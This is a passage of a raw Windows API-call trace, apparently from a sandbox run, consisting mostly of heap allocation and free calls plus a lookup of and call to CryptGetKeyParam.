1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0095.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0095.042] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0095.042] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2860, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2860*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0095.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0095.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0095.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d88 [0095.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0095.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0095.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.046] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0095.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0095.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0095.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0095.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.047] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0095.047] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0095.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0095.047] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0095.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.049] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 